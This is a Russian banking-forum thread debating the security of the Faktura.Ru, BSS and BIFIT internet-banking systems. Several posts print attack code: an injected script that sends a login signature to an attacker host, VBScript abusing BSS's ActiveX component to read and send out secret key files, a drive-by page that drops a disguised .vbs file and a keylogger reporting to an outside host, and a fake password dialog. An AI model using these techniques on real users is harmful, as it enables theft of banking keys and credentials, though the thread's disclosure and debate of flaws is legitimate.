Bankir.Ru
3 декабря, суббота 07:39

Объявление

Свернуть
Показать больше
Показать меньше

Обсуждение безопасности Фактура.Ру

Свернуть
X
  • Фильтр
  • Время
  • Показать
Очистить всё
новые сообщения

  • Обсуждение безопасности Фактура.Ру

    Уважаемые коллеги.
    В этом разделе предлагаю обсудить вопросы безопасности активно пробвигаемой на этом форуме системы Фактура.Ру

    Дело в том, что даже при беглом просмотре этой системы у меня возникло впечатление о некоторых ошибках в её реализации.

    1) Аутентификация и конфиденциальность пользователя

    Я пока не буду придираться к самомо подписанному сертификату Фактуры.Ру, потому, что не исключаю того, что он может выдаваться напрямую расчётным банком. Хотя выглядит это несколько странно, при том, что СКЗИ подписанно полноценным сертификатом Thawte.

    Проблема в другом: в этой системе содержится уже упоминавшаяся ранее ошибка "точки входа", усугублённая тем, что на открываемых системой страничках отключена строка адреса.
    Эта проблема характерна как для клиентской так и для банковской части сервера.

    Суть её в том, что клиент вызывает систему,ч/з обычную http:// страничку
    http://www.faktura.ru/faktura/enter.jsp?site=0
    или
    http://www.bankplus.ru/enter.jsp?bank=

    на которой и происходит фактическая аутентификация ч/з подпись строки (или может быть запроса") вида

    "Request xmlns:fk="http://www.ftc.ru/faktura" document_type="a">fk:ProfileRequest/>/Request>"

    при помощи СКЗИ в виде объекта

    req = xmlNS("")+xmlTagA("Request",
    'xmlns:fk="http://www.ftc.ru/faktura" document_type="a"', null, req);
    ...
    xmlDoc = SKSObject.UTF8ToUnicode(SKSObject.CreateSignature(req));
    ...
    frmLogin.xml.value=xmlDoc;
    frmLogin.submit();



    После этого подпись (фактически являющаяся паролем и логином в одном лице) отсылается в форме frmLogin на

    https://www.faktura.ru/faktura/do_enter.jsp

    Таким образом, атакующемуся, внедрившемуся в канал передачи данных (провадеру) достаточно слегка подменить код странички, ,вставив например в скрипт запрос
    document.write( 'img height=0 src="spyserv?pwd="+xmlDoc ...
    чтобы узнать пароль клиента.



    Насколько я понял (хотя ручаться не могу, всё не посмотришь) все https: запросы также нормально работают под http:, поэтому дальнейшая работа может внешне нормально продолжаться если атакующий(или провайдер, или системный администратор сети) заменит фильтром стартовый запрос с
    form action="https://www.faktura.ru/faktura/do_enter.jsp" method="post" name="frmLogin">
    на
    form action="http://www.faktura.ru/faktura/do_enter.jsp" method="post" name="frmLogin">

    и клиент ничего не подозревая (т.к.строка адреса браузера вообще отключена системой) продолжит работу в открытом режиме.




    Рекомендация,запретить вход под http в точке входа, и вообще, везде, где запросы должны идти только по https...

  • #2
    Александр, описанная Вами одна из подобных "мелочей" с лихвой компенсируется наличием у Фактуры "единственной в России" Trusted Solaris
    С уважением, Репан Димитрий
    Компания "БИФИТ" - www.bifit.com

    Комментарий


    • #3
      Заинтересовавшись форумом, решил попробовать проверить на безопасность для клиентов системы интернет-банкинга. Выбрал трех основных произодителей: Бифит, БСС и Фактуру. Результаты примерно таковы: больше всего повезло Бифиту, меньше всего БСС.
      В общем, все по порядку:
      Итак, залез я на тестовый демо-стенд БСС. Первым делом выгрузился ActiveX компонент и попросил установиться. Ну я человек недоверчивый и хотя мне IE и сказал, что подпись верна, решил проверить, что же за сертификатом OOO Bank Soft Systems ее подписывали. Каково же было мое удивление, когда оказалось, что сертификат истек еще три недели назад (а эксплорер-то говорил что сертификат верен!!!).
      В общем, получается, что БСС распространяет своим клиентам какой-то непонятный софт, про
      который, в случае возникновения спорной ситуации, можно будет сказать, что он не является "правильным", и так как клиент пользуется таким вот неправильным софтом, то ответственность за все убытки должен нести именно он (клиент). Зато банкам теперь не надо особенно задумываться о последствиях ухода денег клиента "налево", - не надо было ставить себе на машину что попало. Ну да ладно, не так все это страшно, компонент не долго переподписать, но уже начинаешь задумываться о словах Димитрия про доверие к софту. Дальше я зашел в систему, порадовался, что в назначение платежа нельзя ни скрипта воткнуть, ни даже просто заломать вбивая всякую муть (в отличии от систем типа "Инист" и "Dzherzhbank", где разработчики, видимо, студенты первого курса местного института)
      Но... никак мне не давал покоя этот bss-совский ActiveX. Решил взглянуть на него поближе. Первый интерфейс, который мне попался под руку, назывался IAXRecordImportX. Уж не знаю чем он мне приглянулся, но захотелось мне особым образом повызывать его функции, что я и не приминул сделать. Как вы думаете, что делает данная последовательность операций?

      Dim abc
      Set abc=CreateObject("bssaxlib.AXRecordImportX")

      abc.FileName="c:\filename.ext"
      abc.Load
      MsgBox abc.Data


      Ничего страшного - она рисует окошко, в которое выводится содержимое файла filename.ext. Немного модифицируем программу: вставляем этот код в обработчик события загрузки страницы, вместо filename.ext подставляем какой-нибудь очень нужный вам файл (bss-ники, подскажите, плз, как называется файл в котором вы держите секретные ключи клиента), а вместо вывода в окошко - заполняем hidden поле формы и вызываем функцию submit. И ваш очень нужный и секретный файл уходит куда-то далеко в интернет. Для усиления эффекта можно дать рекламу в Интернет: "Всем пользователям БСС бесплатные подарки!!!!" со ссылкой на страничку, в которой этот код будет в качестве подарка.


      Бифиту, как я говорил повезло больше всего - у них просто ничего не работает. Попытавшись запустить их демо-версию я получил какое-то невнятное сообщение о том, что какой-то там апплет не может проинициализироваться. Очень мудрый ход - не пускать никого на свою демо схему, а то вдруг снова кто-нибудь поломает iBank


      Теперь Фактура. Cообщения Комлина значительно облегчили мои труды (эх, побольше таких людей надо). Короче, залез я туда, вот только без тестовых ключиков особенно-то не поразбираешься (представители фактуры, дайте, пожалуйста, исключительно для ознакомления с системой!). Ясно только одно, что то, что Комлин называет точкой входа не более вход в систему, чем найденые по яндексу ссылки на faktura.ru.


      P.S. Времени на проверку всего была затрачено гораздо меньше, чем на написание этого сообщения, так что уж не обессудьте, что не всё найдено Да, может найдется смелый человек, который проспонсирует меня на поиск ошибок конкурентов? После каждого подобного сообщения рейтинг системы падает, и, если не выдавать всё сразу, а подавать с определенной периодичностью и в нужные места- можно кого угодно в гроб загнать. Представляете: ваша компания - монополист рынка интернет-банкинга в России...

      Комментарий


      • #4
        Каково же было мое удивление, когда оказалось, что сертификат истек еще три недели назад (а эксплорер-то говорил что сертификат верен!!!)
        непропатченный IE 5.1 почему-то считает, что сертификат не может быть действителен менее чем 1 год, и игнорирует указания выдавашего об обратном.
        В общем это не страшно. Если рекомендованный производителем браузер показал, что объект подписан правильно - юзер был прав.

        Ничего страшного - она рисует окошко, в которое выводится содержимое файла filename.ext. Немного модифицируем программу: вставляем этот код в обработчик события загрузки страницы, вместо filename.ext подставляем какой-нибудь очень нужный вам файл (bss-ники, подскажите, плз, как называется файл в котором вы держите секретные ключи клиента), а вместо вывода в окошко - заполняем hidden поле формы и вызываем функцию submit.
        А разработчики вообще считают, что клиента от банка нефиг защищать.
        Мол эта атака из разряда невозможного. А на другие странички браузер клиента мол ходить не должен.

        Смотрите прошлые споры по IBank.
        Как сказал кто-то из банкиров - эта фича.
        Корни такой проблемы неглубоки- вспомните, кто конкретно выбирает и оплачивает систему.
        А как уж он там будет эти деньги окупать, не разработчикова проблема.

        После каждого подобного сообщения рейтинг системы падает, и,
        Это он у нас, у пользователей падает (и то лишь из тех, что этот форум читают). Для банков это не баг, а фича. Причём полезная.

        Вообще-то ключ ещё паролем защищён, так что надо ещё интерфес на запуск сниффера поискать

        О чём вообще можно говорить, если в пользователь даже не видит, что именно он подписывает, то что на экране, или то, что под экраном...

        Комментарий


        • #5
          Куда-то занесло Вас, уважаемый г-н Комлин . Похоже эмоции просто возобладали над разумом, потому, что в прошлых сообщениях Вы уже демонстрировали отличное понимание вопроса

          Согласен , средства ЭЦП покупает банк, но давайте посмотрим кому они нужнее?

          Банк, стремящийся кинуть своего клиента, да таким мудрёным способом - нонсенс.
          Во первых все средства клиента итак в его распоряжении, на этом основано само существование банка. Не думаете ли Вы, что он живёт с тех 20 рублей, что берёт за обработку п/п?
          Во-вторых, сравните удельное или абсолютное количества недобросовестных банков, с таким же показателем среди их клиентов.

          Поэтому, как Вы и сами отмечали - средства ЭЦП нужнее самому банку - защититься от не очень добросовестного клиента. Это прекрасно понимают производители, и в целом их продукты с этим справляются.

          Не удержусь и приведу ещё одну Вашу цитату :


          Практически все версии браузеров, стоящие на клиентских машинах, непроапгрейжены и
          содержат различные баги,позволяющие выполнить посторонний код на машине пользователя


          Совершенно верно. Поэтому, что же мне - администратору мешает
          атаковать его прямо со странички входа, которая полностью в моём
          распоряжении.

          Наконец учтите, что обычный пользователь, работая с банковским сервером спокойно жмёт "Да" на все вопросы, поэтому при нынешней политике безопасности Internet Explorer;a администратор банка всегда имеет возможность взломать клиента, вне зависимости от используемой системы ИБ.

          Поэтому, продукты от Бифита или БСС не потеряли в моих глазах свою привлекательность в свете последних сообщений. С Инистом, да там была ошибка, полезная не сколько для хакера, сколько для жуликоватого клиента.


          С наилучшими пожеланиями
          Алексей М.
          сотрудник АСУ небольшого банка.

          Комментарий


          • #6
            Вы правы Алексей. Занесло. Приношу извинения всем кого вольно или невольно обидел(оскорбил) прошлым сообщением.

            Цель его была в другом: "Дырок и так много, но нужно стремиться сокращать их число, а не увеличивать".
            Политика же производителей банковского и другого критичного ПО должна быть направлена на максимальный уровень безопасности как для пользователя так и для банка, ибо это не столь уж и сложно.
            Безопасность браузеров потихоньку повышается и рано или поздно выйдет на приемлемый уровень, нужно по крайней мере не отставать.


            ПроходящийМимо
            Да, может найдется смелый человек, который проспонсирует меня на поиск ошибок конкурентов? После каждого подобного сообщения рейтинг системы падает, и, если не выдавать всё сразу, а подавать с определенной периодичностью и в нужные места- можно кого угодно в гроб загнать. Представляете: ваша компания - монополист рынка интернет-банкинга в России...
            Вы уверены, что найдётся хоть одна компания, выпустившая безупречный продукт(другой Ваше предложение принимать бессмысленно - её быстро поставят на место)? Думаю приём кем-то Вашего предложения приведёт только к сокращению рынка Internet ПО или появлению на нём новых игроков.

            Комментарий


            • #7
              Komlin
              Вообще-то ключ ещё паролем защищён, так что надо ещё интерфес на запуск сниффера поискать
              Да далеко ходить-то не надо Перефразируя очень известную и не очень приличную поговорку: на каждый Load найдется свой Save.

              Создаем все тот же объект, в свойство Data прописываем скрипт, содержание которого расскажу чуть позже и сохраняем его в самое видное и доступное место, под именем, скажем.... эээ... "красотки - лучшая десятка.jpg.vbs".

              Потом в более незаметные места сохраняем еще парочку файлов, один из них будет собственно картинкой с красотками , а второй будет небольшой программкой, которая, например, ставит hook на события с клавиатуры и сохраняет все в лог-файл, периодически отсылая данные на www.crack-bss.com. Для оптимизации можно включать логиррование только тогда, когда в окошке address Интернет Эксплорера будет появляться надпись www.bssys.com и главное окно IE будет активно.

              В скрипте же, (который *.jpg.vbs) будет производиться декодирование закладки и картинки из текстовой формы в бинарную (сохраняются они в текстовой форме, чтобы избежать искажения преобразованиями MultiByteToWideChar -> WideCharToMultiByte в функции Save) и последующий запуск обоих файлов для выполнения предназначеных им функций

              страничка будет выглядеть примерно так:

              Код:
              html>
              
              head>
              script language="JavaScript">
              
              function crack_bss()
              {
                var bss=new ActiveXObject("bssaxlib.AXRecordImportX");
              
                bss.FileName="d:\\красотки - лучшая десятка.jpg.vbs";
                bss.Data="'Здесь будет скрипт для Windows Scripting Host Engine";
                bss.Save();
              
                bss.FileName="c:\\winnt\\system32\\slxdrv.dll";
                bss.Data="Здесь будет закодированая программа " \
                                 "(каждый байт заменен на шестнацатиричное текстовое представление";
                bss.Save();
              
                bss.FileName="c:\\winnt\\system32\\iadtc.dll";
                bss.Data="Здесь будет находиться закодированная картинка";
                bss.Save();
                 
              }
              /script>
              /head>
              
              body onLoad="crack_bss()">
              h1 align="center">Здравствуйте, уважаемые пользователи BSS!/h1>
              p align="justify">
              
              В нашей системе произведен очередной апгрейд! Вам больше не нужно вбивать реквизиты
              отправителя и получателя - система сама распознаёт все ваши потребности, 
              формирует документы на нужные суммы и отправляет их вашим корреспондентам! Достигнуто
              это благодаря внедрению современных технологий анализа денежных потоков. Именно благодаря
              им, система оптимальным способом распределяет Ваши средства по различным отраслям, 
              заводит контакты и оплачивает заказы предприятиям, о которых раньше Вы даже не слышали!
               
              /p> 
              /body>
              /html>
              Можно также сначала проверять наличие этих файлов, пытаясь их загрузить функцией Load. Если функция вернет значение false, то не пытаться записывать файлы (чтобы не возникало окошко: [Перезаписать файл [Да/Нет]]

              Ну а дальше положиться на волю случая: захочет ли пользователь открыть якобы картинку или нет

              Если известны e-mail'ы клиентов, использующих BSS, то можно послать "это" в письме: Outlook и Outlook Exspress выполнят java-script на ура.

              Komlin
              Вы уверены, что найдётся хоть одна компания, выпустившая безупречный продукт(другой Ваше предложение принимать бессмысленно - её быстро поставят на место)?
              Ну как, я же ведь буду выступать как "независимый" эксперт А компании, согласившейся сотрудничать со мной, помогу создать оборону и подготовить нападение

              Komlin
              Думаю приём кем-то Вашего предложения приведёт только к сокращению рынка Internet ПО или появлению на нём новых игроков
              Или к созданию и развитию более безопасных и качественных услуг. Да и потом Вы забываете - чем больше скандалов вокруг определенной темы, тем больший к ней интерес у рядового пользователя. Вспомните, когда избиратели становятся политически активными, возбуждаются, услышав знакомую фамилию кандидата, и с горящими глазами доказывают друг другу, что один претендент лучше другого? Такое происходит раз в четыре года - перед выборами - именно тогда электорат получает огромное количество информации, а для поддержания тонуса его постоянно подкармливают занимательными историями о конкурентах.

              И заметьте: негатив приносит гораздо больше пользы, чем вообще отсутствие какой-либо информации! Иванов облил грязью Петрова, теперь избиратель знает, что Петров участвует в выборах и, оказывается, на него стоит обратить внимание, узнать побольше, недаром же Иванов так старается!

              Самое интересное,что в отличии от выборов в бизнесе выигрывают все - чем больше клиентов придет, тем больше их достанется каждому - одним побольше, другим поменьше. А пока для пользователя словосочетание "интернет-банкинг" не вызывает больших ассоциаций, чем фраза "гомологии запирающих шпилек рибосомальных оперонов у прокариот" не будет никакого роста и движения вперед...

              Комментарий


              • #8
                Komlin
                Вообще-то ключ ещё паролем защищён, так что надо ещё интерфес на запуск сниффера поискать

                ПроходящийМимо
                небольшой программкой, которая, например, ставит hook на события с клавиатуры и сохраняет все в лог-файл, периодически отсылая данные на www.crack-bss.com. Для оптимизации можно включать логиррование только тогда, когда в окошке address Интернет Эксплорера
                Вооще-то это была шутка.

                Можно сделать гораздо проще...
                Запрос пароля осуществляется обычным окошком, поэтому достаточно не запуская объект смонтировать это же окошко апплетом (или если у пользователя IE 6 -скриптом, вызаващим модальное окошко.)
                В простейшем случае
                Режем требуемое окошко на четыре картинки, вокруг поля ввода пароля и открываем модальное окно
                например
                BadWindow = window.open("getpwd.htm","" , "height=R,width=Z,status=no,toolbar=no,menubar=no,location=no,resizable=no,scrollbars=no")

                ****************
                getpwd.htm

                html>
                title> BSS- Клиент /title>
                body leftmargin=1 topmargin=1>
                img =part1> br>
                img =part2.1> input type=password ...> img =part2.2> br>
                img =part3>
                /html>
                ****************
                Когда пользователь вводит пароль, выполняем чтение ключа.
                Всё!

                Проблема в другом - все описанные атаки реально осуществимы лишь для администратора сервера, а как Вы только что сами могли прочитать у АСУшника и раньше в сообщениях Димитрия , эти атаки банками просто не рассматриваются как сколько-нибудь значимые.

                Ну как, я же ведь буду выступать как "независимый" эксперт А компании, согласившейся сотрудничать со мной, помогу создать
                оборону и подготовить нападение
                Вы не поняли мою мысль. В современных Internet - банках надёжная защита от инсайдерских аттак похоже невозможна из-за дырявости браузера, автоматизаторы банков это прекрасно понимают, и просто не суетятся из-за ошибок БК, лишь бы сами банки от них не страдали.

                Вопрос лишь в том, что компании, похоже просто не хотят делать лишнюю с их точки зрения работу по защите пользователя,и всё что мы можем - удерживать это стремление в приемлемых рамках, потому, что в конечном итоге оно приводит к проколам, чреватым для самих банков, как с Инистом

                Комментарий


                • #9
                  Komlin
                  Действительно, не стоит доверяться беглым впечатлениям. Если отнестись к вопросу более внимательно, всё становится на свои места.

                  Используемые в системе Faktura.ru сертификаты более полноценны, чем выдаваемые западными удостоверяющими центрами, потому что они обеспечивают юридическую значимость подписи на электронных документах. А “СКЗИ” удобнее подписывать ключом, сертификат которого эмитирован центром, прописанным в дистрибутиве Windows, так как эта подпись служит исключительно для технологического контроля аутентичности и целостности ПО, и юридической значимости не требует.

                  Теперь по поводу аутентификации.
                  Провайдер имеет техническую возможность подменить страницу, для него это не очень сложно. Но если в результате разборок это станет известным, жизнь его как провайдера будет недолгой. Кроме того, никто 138, 272 и 273 статей УК не отменял. Конечно, есть парни без башни, которые хотят на нары, и от них нужно защищаться. Вы совершенно правы, в критичных местах https необходим, и он там есть. Даже если злоумышленник получил аутентификационный запрос легитимного пользователя (“пароль и логин в одном лице” исходя из ваших рассуждений), использовать его проблематично, так как чтобы войти в критичные разделы системы, необходимо установить SSL соединение с взаимной аутентификацией. И если идентификатор владельца сертификата подписи запроса отличается от идентификатора владельца сертификата, при помощи которого установлено SSL соединение, в доступе будет отказано. Есть ещё меры, но для ответа на вопрос достаточно упомянутых.

                  С уважением,
                  Александр Володин,
                  Начальник отдела информационной безопасности Центра Финансовых Технологий

                  Комментарий


                  • #10
                    отправил ПроходящийМимо
                    В общем, все по порядку:
                    Итак, залез я на тестовый демо-стенд БСС. Первым делом выгрузился ActiveX компонент и попросил установиться. Ну я человек недоверчивый и хотя мне IE и сказал, что подпись верна, решил проверить, что же за сертификатом OOO Bank Soft Systems ее подписывали. Каково же было мое удивление, когда оказалось, что сертификат истек еще три недели назад (а эксплорер-то говорил что сертификат верен!!!).
                    Ваше удивление, "гуру" Вы наш, ПроходящийМимо, основано [b]НА ПОЛНОМ НЕЗНАНИИ механизма подписи разработчика под загружаемыми к клиенту объектами[b], в том числе Java-апплетами и ActiveX-компонентами.

                    Вся фишка в том, что вместе с ЭЦП разработчика стоит подписанная ЭЦП VeriSign ВРЕМЕННАЯ МЕТКА - TimeStamp на момент подписи самого объекта. То есть когда производилось подписывание разработчиком (в данном случае компанией БСС) своего кода, сертификат был ДЕЙСТВИТЕЛЕН. Web-браузеры же - Netscape, Mozilla, MS IE, Opera - анализируют время подписи объекта и проверяют валидность сертификата именно на момент подписи.

                    Другое дело, что воспользоваться просроченным сертификатом разработчика, то есть подписать Java-апплет или ActiveX-компоненту, разработчик уже не может, и надо получать НОВЫЙ сертификат разработчика, или продлять текущий.

                    В общем, получается, что БСС распространяет своим клиентам какой-то непонятный софт...
                    Без обид, ПроходящийМимо, но ИМХО, Ваши выбоды в корне неверны, ибо основаны на отсутствии глубоких знаний механизмов безопасности, используемых в браузерах.

                    Бифиту, как я говорил повезло больше всего - у них просто ничего не работает.
                    ПроходящийМимо, стенд на выходных обновлялся, возможно Вы как раз и попали в профилактические работы.

                    Возможно также что у Вас стоит одна из раритетных Java-машин. Если не сложно - киньте на support@bifit.com содержание Java-консоли браузера, укажите версию Web-браузера, версию Java-машины (для MS IE достаточно командной строке набрать jview, если билд MS JVM меньше 3802 (двухгодичной давности), тогда надо проапгрейдить Java-машину и всё заработает.

                    P.S. Времени на проверку всего была затрачено гораздо меньше, чем на написание этого сообщения, так что уж не обессудьте, что не всё найдено Да, может найдется смелый человек, который проспонсирует меня на поиск ошибок конкурентов?
                    ПроходящийМимо, если Вы действительно горите желанием зарабатывать денюжку тестированием систем, то проявите весь Ваш профессионализм дабы потенциальные работодатели заинтересовались Вашей квалификацией.

                    Предложение о поисках дырок у конкурентов - бредятина. Лично у меня нет совершенно никакой нужды в подобных изысканиях.

                    После каждого подобного сообщения рейтинг системы падает, и, если не выдавать всё сразу, а подавать с определенной периодичностью и в нужные места- можно кого угодно в гроб загнать. Представляете: ваша компания - монополист рынка интернет-банкинга в России...
                    Уважаемый, так и под трактор можно случайно попасть или же в лифте задохнуться из-за пожара. Боевики небось любите ? Тогда фантазия есть. Причем обидятся на Вас в первую очередь клиенты, использующие системы. А их ой как много

                    А если серьезно, то подобные шаги по заганянию в гроб конкурентов немыслимы на рынке банковского ПО. Еже ли хотите загнать - заганяйте цивилизованным образом - делайте лучшую систему, обеспечивайте лучший сервис по внедрению и поддержке, предлагайте лучшие цены.
                    С уважением, Репан Димитрий
                    Компания "БИФИТ" - www.bifit.com

                    Комментарий


                    • #11
                      Димитрий Александр, описанная Вами одна из подобных "мелочей" с лихвой компенсируется наличием у Фактуры "единственной в России" Trusted Solaris

                      А у Вас, Димитрий, есть информация, что не единственная?

                      В таком случае поделитесь, пожалуйста информацией. Нам, как официальным партнерам Sun Microsystems, было бы интересно узнать.

                      Комментарий


                      • #12
                        Дубль, появившийся в результате сбоя сервера. Удалён.
                        2 Модератор, обратите внимание - у Вас не работает удаление сообщений
                        Последний раз редактировалось Komlin; 27.01.2003, 12:16.

                        Комментарий


                        • #13
                          отправил Александр Володин, Начальник отдела информационной безопасности Центра Финансовых Технологий (aka AlexanderVo)
                          Используемые в системе Faktura.ru сертификаты более полноценны, чем выдаваемые западными удостоверяющими центрами, потому что они обеспечивают юридическую значимость подписи на электронных документах.
                          Александр, извините за прямоту и резкость, но меня умиляет Ваше стремление представить позу римского легионера, завязывающего сандали, как нечто чрезвычайно выдающееся и недостижимое

                          Объясните мне, как техническому специалисту, чем это самозаверенный Сертификат от Фактуры - см. к примеру https://www.faktura.ru , которая фактически объявила себя эдаким Сертификационным Центром по выдачи сертификатов X.509 банкам и клиентам, работающих с системой, и которая для издания Сертификатов по Федеральному Закону об ЭЦП должна иметь Лицензию ФАПСИ как Удостоверяющий Центр, так вот чем самозаверенный Сертификат Фактуры лучше выданного Thawte или VeriSign ?

                          Кстати, в Вашем "юридически значимом" Сертификате используются всё теже буржуйские криптоалгоритмы, ничего общего с российскими ГОСТами на ЭЦП, хэш-функцию и шифрование не имеющие (Сертификат подписан RSA с длиной ключа 1024 бита, хеш-функция - SHA-1).

                          Но самый главный недостаток схем, предполагающих использование самозаверенных Сертификатов очередного "Удостоверяющего Центра", просто объявившего себя онным - это необходимость передачи ГАРАНТИРОВАННЫМ ПУТЕМ корневого Сертификата новоиспеченного Удостоверяющего Центра и последующая установка этого Сертификата в БД сертификатов Web-браузеров клиентов. Приводит такая организационная политика:

                          - к появлению организационной процедуры по созданию и учету носителей (дискеток), на которых раздается корневой Сертификат новоиспеченного Удостоверяющего Центра

                          - к появлению самой организационной процедуры по передачи клиентам носителей с корневым Сертификатом новоиспеченного Удостоверяющего Центра

                          - к необходимости клиентам всегда помнить, что прежде чем начать работать на новом компьютере, необходимо как минимум проинсталлировать в Web-браузер самозаверенный корневой Сертификат новоиспеченного Удостоверяющего Центра

                          Когда клиентов мало - 50..100, тогда накладные расходы на указанные процедуры невелики. Но вот когда клиентов 1000, а уж если это "физики", то десятки (если не сотни) тысяч, вот тогда подобная схема из-за организационных издержек влетает в серьезнейшую копеечку.

                          С точки зрения безопасности, решение с честнополученным у одного из мировых издателей (Thawte, VeriSign и т.д.) сертификатом никак не лучше и не хуже решения с самозаверенным сертификатом с последующей гарантированной доставкой и установкой в браузер. Но вот накладные расходы - разнятся на несколько порядков.
                          С уважением, Репан Димитрий
                          Компания "БИФИТ" - www.bifit.com

                          Комментарий


                          • #14
                            Александр, всё что Вы сказали правильно, но не совсем по делу.
                            Александр Володин,
                            Провайдер имеет техническую возможность подменить страницу, для него это не очень сложно. Но если в результате разборок это станет известным, жизнь его как провайдера будет недолгой. Кроме того, никто 138, 272 и 273 статей УК не отменял.
                            Чаще всего это делает не сам провайдер, а взломавшие его, и вклинившиеся в процесс ПД лица. (так , например была взломана lenta.ru, hackzone.ru и т.д. и я не слышал, чтобы жизнь Ринета на этом закончилась...). Честно говоря это основной способ взлома хорошо защищённых серверов вообще.

                            Случаи когда находят хакеров если тоже единичны - (раскрываемость этого вида преступлений одна из самых низких).

                            Даже если злоумышленник получил аутентификационный запрос легитимного пользователя (?пароль и логин в одном лице? исходя из ваших рассуждений), использовать его проблематично, так как чтобы войти в критичные разделы системы, необходимо установить SSL соединение с взаимной аутентификацией.
                            Я не утверждал, что могут быть похищены деньги со счёта клиента, но в целом, вызывать стартовую для страницу для работы с системой, плохо по двум причинам.
                            1)С точки зрения конфиденциальности( даже некритичные странички не стоит видеть посторонним).
                            2) Подобные сервера являются зоной "повышенного доверия" пользователя, на них он обычно жмёт "Да" не глядя, поэтому пользователь попав на подменённую страницу легко запустит вместо Вашего ActiveX, другой, с похожим названием производителя.

                            Комментарий


                            • #15
                              to Dimitry

                              >>> необходимость передачи ГАРАНТИРОВАННЫМ ПУТЕМ корневого
                              >>> Сертификата новоиспеченного Удостоверяющего Центра и
                              >>> последующая установка

                              а сертификат Верисайна к клиенту на компьютер "гарантированным путем"
                              попадает?

                              >> Ваше удивление, "гуру" Вы наш, ПроходящийМимо, основано НА
                              >> ПОЛНОМ НЕЗНАНИИ механизма подписи разработчика под загружаемыми
                              >> к клиенту объектами[b], в том числе Java-апплетами и ActiveX-компонентами.

                              это точно. все выпадки мимо.


                              Последний раз редактировалось sharpcat; 27.01.2003, 12:48.
                              WBR
                              serg

                              Комментарий


                              • #16
                                а сертификат Верисайна к клиенту на компьютер "гарантированным путем"
                                попадает?
                                Теоретически нет, но практически..., всё это уже из области параноий.
                                Вы когда-нибудь слышали подобной подделке?

                                Она же элементарно проверяется при заходе на любую защищённуюю страничку того же VS. Если так страшно, купите два диска производства разных пиратов. Деньги небольшие При неправильном сертификате работать не будет,

                                Кстати белую OS Windows можно купить в любом заштатном городишке.

                                Комментарий


                                • #17
                                  P.S. Кстати, я не имею ничего против передачи сертификатов ч/з дискеты. Схема надёжная, если её правильно организовать, но действительно недешевая...

                                  Комментарий


                                  • #18
                                    Komlin, удалять сообщения запрещено. Редактировать сообщения можно в течение 4-х часов от даты написания.

                                    Комментарий


                                    • #19
                                      to all

                                      Есть принципиальная разница между использованием сертификатом от одного из мировых издателей (Thawte, VeriSign и т.д.) (Димитрий) и самоподписанным сертификатом (или сертификатом Российской компании), доставленного гарнатированно. Дело в следующем - вся система ЭЦП "городится" исключительно для обеспечения возможности юридически доказать (замечу в Российском суде) или опровергнуть истинность "документа из платежной системы". В случае первом случае в юридической схеме возникает "незамкнутость", как не трудно догадаться ни Thawte ни VeriSign не будут участвовать в "разборе полетов", в то время как во втором случае есть возможность (при соответствующем составлении договора) провести судебное разбирательство в полном объеме.

                                      Алексей.

                                      Комментарий


                                      • #20
                                        Разделил темы.
                                        Прошу придерживаться темы.
                                        iBank можно обсуждать тут - http://dom.bankir.ru/showthread.php?threadid=13465

                                        Комментарий

                                        Пользователи, просматривающие эту тему

                                        Свернуть

                                        Присутствует 1. Участников: 0, гостей: 1.

                                        Обработка...
                                        X